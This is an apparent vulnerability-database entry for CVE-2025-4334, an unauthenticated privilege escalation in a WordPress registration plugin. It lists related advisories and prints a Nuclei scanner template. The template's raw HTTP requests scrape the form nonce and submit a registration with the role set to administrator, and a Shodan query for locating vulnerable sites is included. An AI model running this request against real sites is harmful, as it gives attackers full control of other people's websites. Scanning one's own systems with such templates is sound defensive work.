| Title | Published | Views | Reporter |
|---|---|---|---|
| Exploit for Improper Privilege Management in Najeebmedia Simple_User_Registration | 26 Jun 2025 11:43 | – | githubexploit |
| Exploit for Improper Privilege Management in Najeebmedia Simple_User_Registration | 8 Jan 2026 15:11 | – | githubexploit |
| Exploit for Improper Privilege Management in Najeebmedia Simple_User_Registration | 8 Jan 2026 15:04 | – | githubexploit |
| Exploit for Improper Privilege Management in Najeebmedia Simple_User_Registration | 18 Aug 2025 09:37 | – | githubexploit |
| Exploit for Improper Privilege Management in Najeebmedia Simple_User_Registration | 25 Oct 2025 16:12 | – | githubexploit |
| CVE-2025-4334 | 26 Jun 2025 02:50 | – | circl |
| WordPress plugin Simple User Registration security vulnerability | 26 Jun 2025 00:00 | – | cnnvd |
| CVE-2025-4334 | 26 Jun 2025 02:06 | – | cve |
| CVE-2025-4334 Simple User Registration <= 6.3 - Unauthenticated Privilege Escalation | 26 Jun 2025 02:06 | – | cvelist |
| EUVD-2025-19388 | 26 Jun 2025 02:06 | – | euvd |

| Source | Link |
|---|---|
| github | www.github.com/Nxploited/CVE-2025-4334 |

```yaml
id: CVE-2025-4334

info:
  name: Simple User Registration <= 6.3 - Unauthenticated Privilege Escalation
  author: pussycat0x
  severity: critical
  description: |
    The Simple User Registration plugin ≤ 6.3 is vulnerable to privilege escalation. It lacks proper restrictions on user meta values during registration. Unauthenticated attackers can exploit this to register as administrators.
  reference:
    - https://github.com/Nxploited/CVE-2025-4334
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-4334
    epss-score: 0.02055
    epss-percentile: 0.78947
    cwe-id: CWE-269
  impact: |
    An attacker can exploit this vulnerability to register with administrator privileges, gaining full control over the WordPress site.
  remediation: |
    Update the Simple User Registration plugin to a version newer than 6.3 when available, or remove the plugin if not essential.
  metadata:
    verified: true
    max-request: 2
    vendor: lifeisincredible
    product: simple-user-registration
    shodan-query: http.component:"wordpress" && http.html:"/wp-content/plugins/simple-user-registration/"
  tags: cve,cve2025,wordpress,wp-plugin,wp,intrusive,plugin,simple-user-registration,vuln

variables:
  username: "{{randstr}}"
  email: "{{randstr}}@{{rand_base(5)}}.com"
  password: "{{to_lower(rand_text_alpha(8))}}"

http:
  - raw:
      - |
        GET /register/ HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-Requested-With: XMLHttpRequest
        Content-Length: 417

        action=wpr_submit_form&wpr_form_id={{wpr_form_id}}&wpr_nonce={{wpr_nonce}}&_wp_http_referer=%2Fregister%2F&wpr%5Bwp_field%5D%5Buser_login%5D={{username}}&wpr%5Bwp_field%5D%5Bfirst_name%5D=first{{username}}&wpr%5Bwp_field%5D%5Blast_name%5D=last{{username}}&wpr%5Bwp_field%5D%5Buser_email%5D={{email}}&wpr%5Bwp_field%5D%5Bpassword%5D={{password}}&wpr%5Bwp_field%5D%5Bconfirm_password%5D={{password}}&wpr%5Bwp_field%5D%5Brole%5D=administrator

    matchers:
      - type: dsl
        dsl:
          - contains(body_1, "WPR Register")
          - contains(body_2, "user_id")
          - contains(body_2, "Registration Done")
        condition: and

    extractors:
      - type: regex
        internal: true
        group: 1
        name: wpr_nonce
        part: body
        regex:
          - 'name="wpr_nonce" value="([a-f0-9]+)"'

      - type: regex
        internal: true
        group: 1
        name: wpr_form_id
        part: body
        regex:
          - 'name="wpr_form_id" value="([0-9]+)"'
# digest: 490a0046304402206c052c83933c2db729ccee4a47ca1ebf3369f77ce289a18270043a791907ff1b02207518a03747c96c1040752657534df406551bcd7f425532abf1bfa4c0b53cc2ad:922c64590222798bb761d5b6d8e72950
```